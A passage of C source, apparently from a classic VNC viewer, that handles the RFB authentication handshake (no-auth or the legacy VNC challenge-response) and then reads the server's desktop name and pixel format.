reason = malloc(reasonLen);
if(!ReadExact(sock, reason, reasonLen))
{
free(reason);
return False;
}
fprintf(stderr,"%s: VNC connection failed: %.*s\n",
programName, (int)reasonLen, reason);
free(reason);
return False;
case rfbNoAuth:
fprintf(stderr,"%s: No authentication needed\n",programName);
break;
case rfbVncAuth:
if(!authWillWork)
{
fprintf(stderr,
"\n%s: VNC server uses the old authentication scheme.\n"
"You should kill your old desktop(s) and restart.\n"
"If you really need to connect to this desktop use "
"vncviewer3.2\n\n",
programName);
return False;
}
if(!ReadExact(sock, (char *)challenge, CHALLENGESIZE)) return False;
if(passwdFile)
{
passwd = vncDecryptPasswdFromFile(passwdFile);
if(passwd == NULL)
return False;
}
else
{
passwd = passwdString;
if(strlen(passwd) > 8)
{
passwd[8] = '\0';
}
}
vncEncryptBytes(challenge, passwd);
/* Lose the password from memory */
for(i=0; i<strlen(passwd); i++)
{
passwd[i] = '\0';
}
if(!WriteExact(sock, challenge, CHALLENGESIZE)) return False;
if(!ReadExact(sock, (char *)&authResult, 4)) return False;
authResult = Swap32IfLE(authResult);
switch(authResult)
{
case rfbVncAuthOK:
fprintf(stderr,"%s: VNC authentication succeeded\n",programName);
break;
case rfbVncAuthFailed:
fprintf(stderr,"%s: VNC authentication failed\n",programName);
return False;
case rfbVncAuthTooMany:
fprintf(stderr,"%s: VNC authentication failed - too many tries\n",
programName);
return False;
default:
fprintf(stderr,"%s: Unknown VNC authentication result: %d\n",
programName,(int)authResult);
return False;
}
break;
default:
fprintf(stderr,
"%s: Unknown authentication scheme from VNC server: %d\n",
programName,(int)authScheme);
return False;
}
ci.shared = (shareDesktop ? 1 : 0);
if(!WriteExact(sock, (char *)&ci, sz_rfbClientInitMsg)) return False;
if(!ReadExact(sock, (char *)&si, sz_rfbServerInitMsg)) return False;
si.framebufferWidth = Swap16IfLE(si.framebufferWidth);
si.framebufferHeight = Swap16IfLE(si.framebufferHeight);
si.format.redMax = Swap16IfLE(si.format.redMax);
si.format.greenMax = Swap16IfLE(si.format.greenMax);
si.format.blueMax = Swap16IfLE(si.format.blueMax);
si.nameLength = Swap32IfLE(si.nameLength);
desktopName = malloc(si.nameLength + 1);
if(!ReadExact(sock, desktopName, si.nameLength))
{
free(desktopName);
return False;
}
desktopName[si.nameLength] = 0;
fprintf(stderr,"%s: Desktop name \"%s\"\n",programName,desktopName);
free(desktopName);
fprintf(stderr,
"%s: Connected to VNC server, using protocol version %d.%d\n",
programName, rfbProtocolMajorVersion, rfbProtocolMinorVersion);
fprintf(stderr,"%s: VNC server default format:\n",programName);
PrintPixelFormat(&si.format);
return True;
}
